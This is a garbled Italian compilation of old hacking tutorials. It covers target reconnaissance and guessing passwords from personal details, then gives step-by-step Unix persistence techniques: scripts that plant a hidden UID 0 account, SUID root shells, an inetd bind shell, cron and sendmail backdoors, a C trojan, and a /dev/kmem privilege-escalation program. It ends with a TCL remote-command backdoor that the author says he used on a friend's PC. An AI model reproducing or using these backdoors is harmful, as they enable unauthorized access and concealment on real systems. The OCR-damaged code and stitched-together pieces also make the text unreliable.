Non avevamo detto che facendo uno scanning delle porte potevamo capire di che s.0. si trattasse ? 
Sì, è vero. 

E allora. E allora facciamo un piccolo discorsetto. 

I servizi forniti dai due s.0. (un*x e NT) sono diversi. Spiego meglio: se guardate quell'elenco sopra 
noterete questa riga: 

Port 23 found. Desc='telnet' 

Cosa vuol dire ? Vuol semplicemente dire che sulla porta 23 risulta attivo Telnet. 

Ora, dato che NT non fomisce (in linea di massima) il Telnet direi che ci troviamo davanti a un 
server Un*x. 

Ma non c'è solo telnet. C'è anche finger e sunrpc che ci confermano che non si può trattare che di un 
un*x (o di un sistema un*x compatibile). 

Vogliamo essere ancora più sicuri ? Prendiamo telnet, ci colleghiamo all'Ip del server e dovremmo 
trovare anche la versione del server. 


Ok, ok, abbiamo imparato come capire se un server è Un*x... Ma se (dato che l'Italia è un paese 
Microsoft dipendente) troviamo invece un Windows NT come facciamo a riconoscerlo ? 

La Microsoft nel confenzionare i suoi prodotti non è che pone una gran cura.. 

Infatti se trovate un server Windows NT scoprirete che la porta 139 è aperta (bug conosciuto ormai 
da chiunque). 


Adesso che abbiamo scoperto tutte le informazioni sul server ci manca una cosa. 

Chi di voi ha visto il film "hacker" ? Bel film, abbastanza realistico.. Forse esagerano quando fanno 
vedere un server come colonne lucenti e gli hacker come luci veloci che scorrono tramite di essi.. 
Ma quel che ci importa è altro. Avete presente la scena in cui il protagonista (e la sua ragazza) si 
tuffano nel bidone della spazzatura dell'azienda per trovare documenti e informazioni su di essa ? 
Ecco, è quel che dobbiamo fare anche noi. No, non ci dobbiamo gettare nei bidoni per ricavare le 
informazioni, ma dobbiamo recuperare (in qualsiasi modo) tutte le informazioni su chi ha costruito 
quel sito e sugli utenti che vi hanno accesso. 

Cercate di scoprire nome e cognome di quanti più utenti possibili, i nomi dei figli, della moglie (o 
della fidanzata), squadra del cuore, giocatore preferito, ecc.. 

Come potete leggere infatti nel mio txt "Fregare le pass a utenti medio/stupidi", nel 99% dei casi la 
password usata dagli utenti (e in percentuale minore anche dal webmaster) sono direttamente 
collegabili al nome, cognome (dell'utente o dei familiari), nome di squadre di calcio, date 
importanti, ecc.. 

Spesso se non sono in questi elenchi sono parole comunque comuni. 

Infatti come fanno altrimenti a ricordarsi la pass ? Provate anche con oggetti comuni, quali casa, 
gatto, cane, ecc.. 

Ricordate però una cosa. Un*x, al contrario di NT, è case sensitive. Quindi ciao, Ciao, CIAO per 
un*x sono tre parole diverse. 


Adesso che abbiamo tutto l'elenco di pass, sappiamo che S.o. usa il server, ecc.. cosa facciamo ? 
Semplice. Andate nella sezione guide del Tank Commandos Web Site e leggete tutte le guide che 
volete. 

E dopo che avete studiato per bene potete provare.. Ma prima pensate un attimo.. 

Pensate ai vostri genitori, ai vostri amici, alla vostra ragazza, al vostro gatto (o cane).. 

Volete davvero rischiare di perdere il loro rispetto per un cazzata ? Lo volete davvero ? 

Volete finire in qualche bel carcere per i minori a fare pompini ai marocchini ? 

Fate come volete, la vita è la vostra, non la mia. 


PRIMA DELL'ATTACCO: L'ANALISI DELLA VITTIMA 


Prima di iniziare ci tengo a sottolineare che non sono affatto un hacker (x 
il momento almeno...:)) 

e che questo è il primo testo che scrivo..Quindi non è stato scritto x 
persone esperte 

ma per newbies come me ke voglione imparare le basi dell'hacking! 


N.B. gran parte delle informazioni di questo articolo sono tratte dal libro 
Hacker! Tecniche di 
protezione dei sistemi. 


Bene dopo questa breve introduzione iniziamo.. 


Una delle cose più importanti da fare prima di hackerare un sistema è 
cercare di raccogliere 

più informazioni possibili. Questa fase è spesso sottovaluta dai 
principianti che il più delle 

volte si limitano a fare un semplice portscanning e poi a cercare un exploit 
che sfrutti un bug 

nei programmi che girano nella macchina. 

Quando però i sistemi da hackerare sono più complessi e più sicuri, un 
semplice portscanning non 

basta, ma bisogna scoprire tutte le info possibili sul target. 


--- Passo 1. Il sito web 


Il punto di partenza per la raccolta di informazioni è naturalmente (quando 
presente!) il sito 

internet dell'obbiettivo (per esempio un azienda). Prima di tutto 
controllate l'estensione della 

pagine web. Se è .asp quasi sicuramente si tratta di un sistema WinNT, se 
invece sono presenti 

pagine php o script cgi si tratta di un sistema *nix. Controllate anche il 
codice sorgente delle 

pagine alla ricerca di eventuali commenti inseriti dai webmaster. A volte 
contengo informazioni 

sull'O.S. e sul web server che gira sul server vittima. 


--- Passo 2. Indagine sul dominio 


Dopo aver settacciato il sito web della vittima, bisogna cercare di recupare 
più informazioni 

possibili sul dominio di questa. Per far questo bisogna interrogare i 
database InterNIC gestito 

da Network Solutions (www.networksolutions.com) e ARIN (www.arin.net). 
Questi due database 

contengo informazioni su tutti i domini internazionali (.com .net .org. 

.edu) registrati. Per interrogare questi database esistono 

diversi metodi, i più importanti sono: attraverso l'interfaccia web o usando 
dei software specifici. 

Se si sceglie il primo metodo basta andare sul loro sito, se invece si vuole 
usare un software 

specifico io consiglio Ws Ping PRoPack che si può trovare su 
www.ipswitch.com 

Le informazioni più importanti che fornisco questi database sono: i dati del 
registrante 

(nome e cognome) e gli indirizzi del DNS usato dalla macchina. Ricordate che 
questi due 

database contengo informazioni solo sui domini internazionali, x gli altri 
indirizzi nazionali, dovete andare 

sul sito web delle aziende che gestisco le registrazioni. 


-- Passo 3. Traceroute 


Quando avrete scoperto più informazioni possibili sul dominio della vittima 
occorre fare un analisi 

accurata del percorso che i pacchetti fanno per raggiungere il server della 
vittima. Per questo 

scopo esistono diversi programmi, per windows è disponibile già un'utility 
tracert (per avviarlo 

scrivete tracert hostvittima.com su esegui), se invece utilizzate linux è 
presente anche qui un utility 

simile che potete avviare scrivendo traceroute hostvittima.com da una 
shell). Il risultato sarà una 

cosa del tipo: 


1 109ms 102ms 100 ms Fe0-0-0.NAS-RM-1.tiscali.it [195.130.232.51] 

2 106ms 109ms 97 ms Fe0-0.GW206-RM tiscali.it [195.130.232.49] 

3 112 ms 110 ms 115 ms Ser3-1-0.GWS505-RM tiscali.it 
[195.130.235.141] 


4 117 ms 107 ms 108 ms Ge3-0.GWGSR-MI tiscali.it [195.130.254.82] 
5 108ms 110 ms 143ms infostrada-mix.mix-it.net [217.29.66.9] 
6 110 ms 112 ms 116 ms 192.94,212.189 
7 114ms 106ms 108 ms 192.94.212.125 
8155 ms 119 ms 125 ms 192.94.212.146 
9 121 ms 119 ms 118 ms 151.5.206.74 
10 127 ms 123 ms 119 ms 151.5.148.82 
11 150 ms 147 ms 149 ms 151.5.149.2 
12 156 ms 150ms 148 ms gw15.dada.it [195.110.97.48] 
13 163 ms 160 ms 157 ms vittima.it [195.110.99.208] 


Rilevazione completata. 


Ogni singolo host (in tutto sono 13) rappresente un Hop cioè un salto che il 
paccheto deve fare 

prima di arrivare all'ultimo host il 13. Dove possibile tracerout risolve 
anche il nome dell'host. 

A volte può capitare che un HOP non venga indicato, cioè succede 
probabilmente perchè dall'altra 

parte c'è un firewall che blocca i pacchetti UDP che usa traceroute. Per 
risolvere questo 

inconviente si può, solo sotto linux, utilizzare l'opzione -S -p53, in 
questo modo si indica a 

traceroute di utilizzare la porta 53 (quella dei DNS) per sondare gli HOP. 


-- Passo 4. Scansione delle porte 


A questo punto dopo aver raccolto ulteriori informazioni con traceroute, 
passiamo ad una delle 

tecniche più importanti per ottenere informazioni sul computer della 
vittima: il port scanning. 


Il port scanning consiste nella connessione alle porte TCP e UDP presenti 
nel sistema scelto 
come obbiettivo per stabilire quali servizi girano. Per fare il port 
scanning esistono 2 metodi 
principali: 
1) connettersi manualmente a ogni porta per sapere se è attiva (lungo e 
noioso, sconsigliato) 
2) usare un software apposito detto port scanner (consigliato) 
In giro per la rete sono presenti centinaia di port scanner quindi non avrete 
problemi a trovarne 
uno. Io consglio di usare il 7th Sphere Portscan per windows e NMAP per 
linux. I port scanner 
lavorano utilizzando diverse tecniche di scansione: 
I)TCP CONNECT SCAN : ovvero il port scanner si collega alla porta 
dell'obbiettivo con una connessione 

a tre fasi. E' facilmente intercettabile. 
2)TCP SYN SCAN: ovvero il port scanner non esegue una connessione completa 
con l'obbiettivo. Più 

difficile da rilevare della precedente. 
3)TCP FIN SCAN: ovvero il port scanner invia un pacchetto FIN sulla porta. 
Funziona solo sui sistemi 

UNIX 
La più diffusa è la prima tecnica, mentre la secondo è più raffinata e 
discreta. 
Il risultato di una scansione delle porte è in genere di questo tipo. 


PORITSCAN READY 

SCANNING HOST :vittima.it 

SCAN BEGUN ON PORT:1 SCAN HALTED ON PORT:354 
21 :CONNECT 220 FTP server (SunOS 5.8) ready. 

22 :CONNECT SSH-1.99-OpenSSH_2.3.0p1 

25 :CONNECT 220 ESMTP Postfix 

80 :CONNECT 

111 :CONNECT 


Come si vede dalla scansione sul sistema vittima è montato un sistema UNIX 
(SunOS 5.8) e alcuni 

servizi. Avrete quindi capito che una delle informazioni più importanti che 
può fornire un 

port scanning è il sistema operativo (N.B. non sempre si è così fortunati 


5) 


INTRODUZIONE 


Uno dei principali problemi connessi all'hacking e' mantenere i privilegi di 

amministratore in un sistema dopo una eventuale intrusione. In questo 

articolo descrivero' le piu' comuni procedure per mantenere i privilegi di 

root in un sistema UNIX, supponendo che siate riusciti ad impadronirvi dei 

privilegi di amministratore in precedenza. 

Innanzitutto le backdoors che descrivero' di seguito sono solo le piu' famose, 

ma praticamente una volta in possesso della root, su un sistema Unix e' 

possibile creare un'infinita' di backdoors a seconda della propria fantasia. 

Prima di installare una backdoor sul sistema ci sono alcune cose che bisogna 

sapere: 

1.La posizione dei principali file in un sistema UNIX 

2.Familiarita' con il formato del file passwd (il formato a 7 campi, i campi 
GECOS, i meccanismi dello shadowing) 

3.Familiarita' con editor come vi; non sempre saranno disponibili editor come 
pico o Emacs con un interfaccia user-friendly 


Inoltre e' bene considerare che la permanenza di tali backdoors dipendera' 
anche dalle abilita' tecniche del vero amministratore del sistema. Un 
amministratore degno di questo nome sara', infatti, a conoscenza di tutte le 
backdoors qui descritte. 


CANCELLARE LE PROPRIE TRACCE 


Innanzi tutto e' importante, prima di entrare in un server, essere sicuri a 
priori che si potranno cancellare le tracce della propria intrusione 
modificando quindi i file che loggano la vostra presenza sul sistema. Se un 
amministratore non si accorge di eventuali intrusioni, e' meno probabile che 
cerchi di trovare backdoors. E' consigliabile anche fare uno di script co 


me 
marry.c e hide.c che rendono invisibile la propria presenza al sistema. Chi 
fosse interessato me li puo' richiedere via mail. 


BACKDOOR EVIDENTE 


La backdoor piu' semplice, ma allo stesso tempo piu' evidente, a cui possiamo 
pensare consiste nell'aggiungere al passwd un account con UID 0. Comunque fare 
una cosa del genere sarebbe com dire all'amministratore "Ehi sto attaccando il 

tuo server!". Se proprio vogliamo installare una backdoor di questo tipo 

sarebbe opportuno non porre semplicemente questo account all'inizio o alla 

fine del passwd altrimenti ognuno che esaminasse anche casualmente il passwd 
lo noterebbe. Il mio consiglio e', quindi, quello di aggiungere questo tipo di 
account nel mezzo del passwd con questo script: 


#!/bin/csh 


# Inserisce un account con UID 0 nel mezzo del passwd 


set linecount = ‘wc -l /etc/passwd° 

cd 

cp /etc/passwd ./temppass 

echo Il passwd file ha $linecount[1] linee. 

@ linecount[1] /= 2 

@ linecount[1] += 1 

echo Sto creando due file, ognuno da $linecount[1] linee . 
split -$linecount[1] ./temppass 

echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./gxaa #Modificate questa lineaJ 
cat ./xab >> ./xaa 

mv ./xaa /etc/passwd 

chmod 644 /etc/passwd 

rm ./xa* ./temppass 

echo Fatto... 


E' ovvio che EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh va 
modificato a seconda delle vostre esigenze inoltre MAI MAI MAI modificare la 
passwd di root, le ragioni sono ovvie. 


Inoltre in maniera simile e' possibile abilitare uno di quegli account (sync, 
games) con UID abbastanza alto che di solito sono disabilitati (hanno un * al 
posto della passwd criptata). In questo caso prendete uno di questi account 
disabilitati, mettetegli UID 0 e cancellate il "*" dal secondo campo del 
passwd. 


Lasciare una shell nel /tmp 


E' anche possibile lasciare una shell con privilegi da root nella directory 
/tmp 


#!/bin/sh 


cp /bin/csh /tmp/.evilnaughtyshell — # Non chiamatela cosi... 
chmod 4755 /tmp/.evilnaughtyshell 


Comunque molti sistemi hanno dei task nel crontab che fanno pulizia nella 
directory /tmp ogni notte, altri hanno la directory /tmp montata in modo da 
non permettere la presenza di shell SUID; e' possibile, avendo la root, 
disabilitare tutti questi ma qui si ritorna al discorso di prima perche' 
disabilitare tutte queste impostazioni significa rendere evidente l'attacco. 
Comunque per evitare sorprese e' bene controllare i file 
/var/spool/cron/crontabs/root e etc/fstab. 


BACKDOOR NASCOSTA 


I file principali di configurazione del server non saranno certo il primo 

posto dove l'amministratore andra' a cercare backdoors, e quindi, perche' non 
metterne una li? Prima alcune informazioni: l'Internet Daemon (/etc/inetd) 
ascolta le richieste di connessione su porte TCP o UDP ed apre un programma 
appropriatro quando arriva una richiesta di connessione. 

Il formato del file /etc/inetd.conf e' semplice: 


(1) (2) (03) (4) (65) (0 (7) 
ftp stream tcp nowait root /usr/etc/ftpd  ftpd 
talk. dgram udp wait root /usr/etc/ntalkd ntalkd 


Il campo (1) contiene il nome del daemon proprio come e' contenuto nell'etc/services. 
Questo campo dice all'internet daemon cosa cercare nell'etc/services per 
determinare quale porta associare al nome di ogni singolo programma. Il campo 
(2) dice all'inetd il daemon che tipo di connessione accetta. Il TCP usa il 

socket di tipo stream, mentre l' UDP usa i datagrammi. Il campo (3) e' il 

campo che indica il protocollo di trasmissione (TCP o UDP). Il campo (4) 
indica se il daemon e' iterativo o concorrente. L'opzione "wait" indica che il 
server eseguira' una connessione e fara' attendere tutte le altre. "Nowait" 

al contrario, indica che il server accettera' una connessione, inizia un 

processo child per gestire la connessione e poi tornera' in modalita' sleep 

ad attendere altre connessioni. Il campo (5) indica con quale user (o meglio 

con quale UID) il daemon e' mandato in esecuzione. Il campo (6) indica quale 
programma eseguire quando una connessione arriva e (7) e' il comando con 
relative opzioni relative al programma precedentemente detto. Se il programma 
non richiede alcuna interazione dello user, l'inetd lo puo' gestire 

internamente. Questo si realizza con un opzione "interno" ( -i) nei campi (6) 

e (7). Per installare una backdoor basta scegliere un servizio che non e' 

usato spesso e sostituite il daemon che usualmente e' addetto a quel servizio 
con qualcos'altro. Potreste sostituirlo, ad esempio, con una shell SUID , un 
programma che aggiunge un account root nell'etc/passwd....etc..etc.. 


Esempio: 

Aprite il file etc/inetd.conf in un editor disponibile. Trovare la linea: 

daytime stream tcp nowait root internal 

e cambiatela in: 

daytime stream tcp nowait /bin/sh sh-i. 

Ora avete bisogno di riavviare l'etc/inetd cosi da fargli leggere di nuovo il 
file di configurazione. Dipende da voi come volete fare questo. Potete killare 
e riavviare il processo, (kill -9 , /usr/sbin/inetd o usr/etc/inetd ) che 


pero' INTERROMPERA!' tutte le connessioni dall'esterno....quindi sarebbe una 
buona idea fare questo non negli orari di punta. 


Un alternativa a compromettere un servizio ben conosciuto sarebbe installarne 
uno nuovo che esegue un programma a vostra scelta. Una soluzione semplice 
sarebbe immettere una shell che lavora allo stesso modo della backdoor 
precedentemente descritta. C'e' bisogno pero', che il nome del servizio 
compaia nell'etc/services come nello /etc/inetd.conf. 


Il formato dell' etc/services e' semplice: 


(1) (2/0) (4) 
smtp 25/tcp mail 


Il campo (1) e' il nome del servizio, il campo (2) e' il numero della porta, 
(3) e' il tipo di protocollo che il servizio aspetta, ed il campo (4) contiene 

il nome comune associato al servizio. Per esempio, aggiungete questa linea 
all' etc/services: 


evil  22/tcp evil 

e questa linea al etc/inetd.conf: 

evil stream tcp nowait /bin/sh sh -i 
ed infine riavviate l'inetd come detto sopra. 


NB:queste sono backdoors molto potenti...non solo offrono il rientro nel 
sistema da locale ma da qualsiasi account su qualsiasi computer 
dell'Internet...;) 


BACKDOORS CON IL CRON 


Cron e' uno strumento meraviglioso per l'amministrazione del sistema....ma e' 
anche uno strumento meraviglioso per creare backdoors perche' il crontab del 
root ha, effettivamente, i privilegi di root; di nuovo a seconda del livello 
dell'esperienza dell'amministratore di sistema questo tipo di backdoor puo 
funzionare piu' o meno a lungo. 

Il file /var/spool/crontabs/root e' dove si trova la lista dei cron jobs del 

root di solito. Qui ci sono diverse alternative; ne cito solo un paio, poiche' 

le backdoors basate sul cron sono limitate soltanto dalla vostra fantasia. 

Il cron e' uno strumento che automaticamente esegue comandi ad orari e date 
prestabilite. Crontab e' il comando da usare per aggiungere, rimuovere o 
vedere i vari cron jobs. Si puo' sia editare manualmente il file 
/var/spool/crontab/root che modificarlo con il comando crontab stesso. 


Ogni riga del crontab ha sei campi: 


(1) 2) (03) (A 06) (6 
O: i. 3 ù 1. /usr/bin/updatedb 


I campi da (1) a (6) sono rispettivamente: i minuti (0-59), le ore (0-23), 
giorno del mese (1-31), mese dell' anno (1-12), giorno della settimana (0-6). 
Il campo (6) contiene i comandi da eseguire. Lo script dell'esempio di sopra 
e' eseguito tutti i lunedi. Per sfruttare il crontab basta aggiungere una riga 

a /var/spool/crontab/root. Per esempio possiamo avere un cron job che viene 
eseguito ogni giorno e che controlla se nell' /etc/passwd c'e' ancora un 
account con UID 0 che abbiamo precedentemente aggiunto, altrimrenti 
aggiungerlo se questo non e' piu' presente. Potrebbe essere una buona idea 
inserire uno shell script in un cronjob che esiste gia per nascondere 
ulteriormente la backdoor. 


Ad esempio aggiungere la seguente linea a /var/spool/crontab/root 


00 z ù * —/usr/bin/trojancode 


dove trojancode e' il seguente shell script: 


#!/bin/csh 
# C'e' il nostro account nel passwd? 


set evilflag = ( grep eviluser /etc/passwd°) 


if($#evilflag == 0) then 


set linecount = ‘wc -l /etc/passwd° 
cd 
cp /etc/passwd ./temppass 
@ linecount[1] /= 2 
@ linecount[1] += 1 
split -$linecount[1] ./temppass 
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa 
cat ./xab >> ./xaa 
mv ./xaa /etc/passwd 
chmod 644 /etc/passwd 
rm ./xa* ./temppass 
echo Done... 
else 
endif 


Possiamo anche fare qualcos'altro con il cron tab. Dobbiamo avere anche un 
altro password file nascosto da qualche parte (/var/spool7mail/.sneaky 
potrebbe essere un idea...). In questo passwd ci deve essere un solo account 
root. Poi mandiamo in esecuzione un cronjob che ogni mattina alle 2.30 salva 
una copia del vero passwd da qualche parte e installera quello hakkato come 


VERO /etc/passwd per un minuto. Ogni utente normale che tentera' di effetuare 
il login non potra' entrare nel sistema ma un minuto dopo la situazione sara' 

di nuovo sotto controllo. Aggiungete questa riga al crontab del root: 

20:; 2 ù di * —/bin/usr/sneakysneaky_passwd 

Accertatevi che questo esista: 

#echo "root::0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky 


e questo e' un semplice shell script: 


#!/bin/csh 
# Installa un passwd hakkato per un minuto 


cp /etc/passwd /etc/.temppass 

cp /var/spool/mail/.sneaky /etc/passwd 
sleep 60 

mv /etc/.temppass /etc/passwd 


A questo punto perche' non servirsi del codice c per rendere meno visibile la 
backdoor? Questo di seguito e' un cavallo di troia che crea una shell SUID 
root . 

/* daemon9@netcom.com */ 


#include 


#define KEYWORD "industry3" 
#define BUFFERSIZE 10 


int main(argc, argv) 
int argc; 
char *argvl ];{ 

int i=0; 

if(argv[1]){ /* we've got an argument, is it the keyword? */ 

if(!(stremp(KEYWORD,argv[1]))){ 
/* This is the trojan part. */ 
system("cp /bin/csh /bin/.swp121"); 


system("chown root /bin/.swp121"); 
system("chmod 4755 /bin/.swp121"); 


/* Put your possibly system specific trojan 


messages here */ 
/* Let's look like we're doing something... */ 
printf("Sychronizing bitmap image records."); 
/* system("ls -alR / >& /dev/null > /dev/null&"); */ 
for(;i<10;i++){ 
fprintf(stderr,"."); 
sleep(1); 


printf("\nDone.\n"); 
return(0); 
} /* End main */ 


BACKDOOR CON IL SENDMAIL 


Il file degli alias del sendmail permette alla posta mandata ad un singolo 
utente di essere processata di seguito da un programma. Ad esempio aggiungete 
la linea: decode: |/usr/bin/uudecode al file /etc/aliases 


Questo e' il uudecode ;)) 


uudecode.sh 


#!/bin/sh 
# Crea il nostro file rhosts 


echo "+ +" > tmpfile 
/usr/bin/uuencode tmpfile /root/.rhosts 


Dopo basta telnettare alla porta 25 dell'host all'utente decode@host.com e 
usare come subject la versione "uuencoded" del file .rhosts. Per mettere tutto 
su una sola linea: 


echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com 


potete essere creativi quanto volete....potete settare un alias che faccia 
eseguire un programma di vostra scelta... 


BACKDOOR INSOSPETTABILE 


Oltre a questi metodi qui descritti si puo aggiungere del codice hakkato 
all'interno di programmi comuni. Questo e' un metodo quasi infallibile che 
puo' essere notato solo da programmi come tripware. L'idea e' semplice: 
inserire del codice nel sorgente di programmi comunemente usati alcuni dei 
programmi piu utili a noi in questi caso sono su, login, passwd perche' 

gia mandano in esecuzione il SUID a root e non c'e' bisogno di modifiche ai 
permessi. Una volta che vi siete procurati il sorgente, strutturate la 


backdoor in questo modo: 


get input; 

if input is special backdoor flag,run backdoor program ; 
else if input is valid ,continue; 

else quit with error; 


Questo comunque e' solo un estratto di pseudo codice ...solo per dare un idea 
di come impostare la cosa. 


BACKDOOR ESOTERICA 


Exploit con il /dev/kmem!!! Poiche' il kernel tiene i suoi parametri in 

memoria e' possibile modificare la memoria della macchina per cambiare l'UID 
del vostro processo. Per fare questo c'e' bisogno che comunque il /dev/kmem 
abbia permesso di lettura/scrittura. In pratica vengono eseguite le seguenti 
operazioni: Si apre il /dev/kmem, si cerca la vostra page in memoria, si 
sovrascriva l'UID del vostro processo e in seguito viene aperta una shell csh 
che ereditera' l'UID del vostro processo. Il segunte programma fa proprio 
questo. 


/* If /kmem is is readable and writable, this program will change the user's 
UID and GID to 0. */ 

/* This code originally appeared in "UNIX security: A practical tutorial" 
with some modifications by daemon9@netcom.com */ 


#include 
#include 
#include 
#include 
#include 
#include 
#include 


#define KEYWORD "nomenclature1" 


struct user userpage; 
long address(), userlocation; 


int main(argc, argv, envp) 
int argc; 
char *argv[], *envpl[];{ 


int count, fd; 
long where, lseek(); 


if(argv[1]){ /* we've got an argument, is it the keyword? */ 
if(!(stremp(KEYWORD,argv[1]))){ 
fd=(open("/dev/kmem",0_RDWR); 


if(fa<0){ 
printf("Cannot read or write to /dev/kmem\n"); 
perror(argv); 
exit(10); 

} 


userlocation=address(); 
where=(lseek(fd,userlocation,0); 


if(where!=userlocation){ 
printf("Cannot seek to user page\n"); 
perror(argv); 
exit(20); 
} 
count=read(fd,&userpage,sizeof(struct user); 
if(count!=sizeof(struct user)){ 
printf("Cannot read user page\n"); 
perror(argv); 
exit(30); 
} 


printf("Current UID: %d\n",userpage.u_ruid); 
printf("Current GID: %d\n",userpage.g_ruid); 


userpage.u_ruid=0; 
userpage.u_rgid=0; 


where=lseek(fd,userlocation,0); 
if(where!=userlocation){ 
printf("Cannot seek to user page\n"); 
perror(argv); 
exit(40); 
, 
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage)); 
execle("/bin/csh","/bin/csh","-i",(char *)0, envp); 


} 


} /* End main */ 


#include 
#include 
#include 


#define LNULL ((LDFILE *)0) 


long address(){ 


} 


LDFILE *object; 
SYMENT symbol; 
long idx=0; 


object=1dopen("/unix",LNULL); 


if(!object){ 
fprintf(stderr,"Cannot open /unix.\n"); 
exit(50); 

} 


for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ 
if(!stremp("_u",ldgetname(object,&symbol))){ 
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value); 
Idclose(object); 
return(symbol.n_value); 


} 


fprintf(stderr,"Cannot read symbol table in /unix.\n"); 
exit(60); 


E' necessario, affinche' il codice precedente funzioni, che il /dev/kmem sia 
scrivibile, e questo non e' quello che succede di solito, dobbiamo occuparcene 
noi. Il mio conisglio e' quello di scrivere uno shell script che cambi i 

permessi del /dev/kmem per una discreta quantita' di tempo (diciamo 5 minuti) 
e poi li cambi di nuovo nella loro configurazione iniziale; potete utilizzare 
questo script: 


chmod 666 /dev/kmem 
sleep 300 
chmod 600 /dev/kmem 


| by | 
| Michael Bakunin Î 
| <bakunin@maphiasoft.org> | 


Eccomi di nuovo qui! Sono tornato con una bella idea (0 forse molto più di 
un'idea :) ) molto caruccia sull'installazione di una backdoor in un sistema 
*nix e Linux. Io l'ho provato su LINUX e vi assicuro che funziona! Quindi... 


...prima di incominciare vi devo dire questo: 


3 AE Ae Ae e e SE AE Ae Ae Sie SE SE Ae e ie Sie SE Ae Ae Sie Sie > SE Ae Ae Sie Se SE Ae Ae e Sie Se SE Ae e Sie Se SE Ae Ae Sie e E AE Ae e Se E Ae e A RARA AAA A 


** Tutto quello che scriverò è solo a scopo informativo, quindi ** 
*** se fate danni o semplicemente vi sgamano e vi trovare la pula *** 
*** sotto casa... è solo un problema vostro. In non centro ve 


** assolutamente con l'uso che fate di queste informazioni!  ** 
3 AE Ae Ae ie e E AE Ae Ae Sie e E Ae e ie Sie SE SE Ae Ae Sie Sie > AE Ae Ae Sie Se SE Ae Ae e Sie SE Ae Ae ie Sie SR AE Ae e Sie Se E AE Ae Ae Sie > Ae Ae A RAR AAA AREA 


Che cosa vi voglio raccontare oggi? Semplicemente come creare un trojan e 
come piazzarlo un sistema LINUX in modo che parta all'avvio autonomamente 
permettentoci di fare sulla macchina della vittima ciò che ci pare e piace! 


Io l'ho provato sul PC di un mio amico :) che ha la RH 6.0 e mi sono divertito 
tanto, tanto! Anzi... tantissimo! Poi lui ha fatto casini e ha reinstallato 

tutto portandosi alla RH 6.1... Magari rifaccio il giochino! 

Probabilmente conoscendolo sta leggendo pure questo articolo (PS: se verrà 
pubblicato!) quindi... non vi posso (ma soprattutto non GLI!) posso dire il 
nome. 


Io ho scelto il TCL come linguaggio per un semplice fatto: 1 è veloce da 
scrivere! Si può scrivere direttamente sul computer della vittima :) 


Ma saltiamo i convenevoli e passiamo subito alla parte pratica del gioco! 


CONOSCENZE INDISPENSABILI: 


1 Un minimo di programmazione in TCL/TK 
2 Saper conquistare il root in un sistema UNIX 


Questo articolo si occupa di 3 cose: 


1 CREAZIONE DI UN SERVER 


2 CREAZIONE DI UN CLIENT 
3 COME METTERE IL SERVER ALL'AVVIO DI LINUX 


Fin qui dovremmo esserci! 
Premessa: 


1 

Tutta a programmazione che qui vi mostrerò sarà fatta in TCL. E' "di serie" su 
tutte le piattaforme linux e in teoria su tutte le piattaforme *NIX. Dico in 
teoria perchè diciamo che se prendete una distro UNIX degli anni 60... forse 
non c'è ancora! 


2 
Non mi preoccupo in questo articolo di come procorarci il "root". Mi preoccupo 
soltanto della creazione della backdoor. 


Inizio: 


Noi sappiamo che esistono dozzine di backdoors. Sicuramente il più semplice è 
un aggiungere un nuovo utente con permessi root, ma fin tanto che voi creiate 
un nick anonimo, comunque l'amministratore prima o poi se ne accorgerà. 


Forse, una più sofisticata è creare un server da piazzare all'interno dell'OS 
in modo particolarmente anonimo, che parta all'avvio e che ascolti una porta 
sconosciuta. È possibile accorgersi pure qui della presenza della backdoor... 
ma forse è più complicato (specie se OP è particolarmente incompetente!). 


Facciamo un server particolarmente semplice per iniziare in TCL: 


#!/usr/bin/tcl 


proc ascolta { fd addr port } { 
while { [ gets $fd1]!= -1 } { 
puts "ricevuto: $1" 


} 
flush stdout 
} 


set s [ socket -server ascolta 9999 ] 


vwait name 


Se volete altri esempi... leggete il mio articolo sul confronto tra i socket. 
Lì c'è anche una spiegazione generale del funzionamento. 


Abbiamo creato un socket "s" che è server e che ascolta alla porta 9999. 
Quanto avviene la connessione di un client, parte la procedura "ascolta" che 
riceve dati e li stampa. 

Finqui niente di che! 

Incominciamo a modificarlo per bene: 


1 CI VA BENE LA PORTA 9999 ? Fate un po' voi... 


2 COSA GLI FACCIAMO FARE? 
Incominciamo con l'eseguire un comando... 


In TCL per fare questo si usa il comando: 
EXEC comando opzioni 


Quindi diventerebbe: 


#!/usr/bin/tcl 


proc ascolta { fd addr port } { 
while { [ gets $fd1]!= -1 } { 
exec $1 & 
} 
flush stdout 
} 


set s [ socket -server ascolta 9999 ] 


vwait name 


Ho aggiunto anche il segno & che avvia il comando in background... 
Così possiamo fare più comandi che richiedono tempo! 


Possiamo anche dare un saluto iniziale e un messaggio di avvenuto messaggio. 
Questo si fa con il comando PUTS 

Che diventa: 

PUTS $socket "MESSAGGIO" 


#!/usr/bin/tcl 


proc ascolta { fd addr port } { 
puts $fd "$addr:$port you are connected to the 999 port" 


while { [ gets $fd1]!= -1 } { 
exec $1 & 

puts $fd "ok" 

} 


flush stdout 
} 


set s [ socket -server ascolta 9999 ] 


vwait name 


Vi chiedete perchè in inglese? Meglio non rischiare! Unix è tutto in inglese. 
Cosa succedere fino a qui se montassimo questo socket? Che appena un client si 
connetterebbe, riceverebbe il messaggio farebbe l'operazioni e poi si 


chiuderebbe all'istante. 


Questo vuol dire che se io voglio entrare nella directory /usr/sbin e lanciare 
un programma, dovrete mettere come messaggio dal client questo: 


cd /usr/sbin;./nome_programma 

ok? 

Questo perchè in LINUX come in UNIX i comandi possono essere dati anche non in 
serie ma separati da un ; 

Questo potrebbe essere soddisfacente perchè apre la porta in modo veloce... 
il client, appena dato il comando si sconnetterà data il fatto che il comando 

è stato messo in background. 

Mica male! 

Da notar il ciclo che ci permette di dare un messaggio più di una riga. Questo 
ci sarà utile per il CLIENT quindi... 

Ora preoccupiamoci del CLIENT: 


Il client può essere benissimmo una semplice sessione di telnet, ma dato che 
ci piace fare i raffinati, facciamolo fino in fondo! 


Facciamo un CLIENT grafico che si connetta ad un server dato alla porta 9999 
e che gli mandi i comandi che vogliamo. 


#!/usr/bin/wish 
set host "" 
set msg "" 

#Con questi imposto il titolo e la geometria della finestra: 
wm title . "CLIENT by BAKUNIN" 

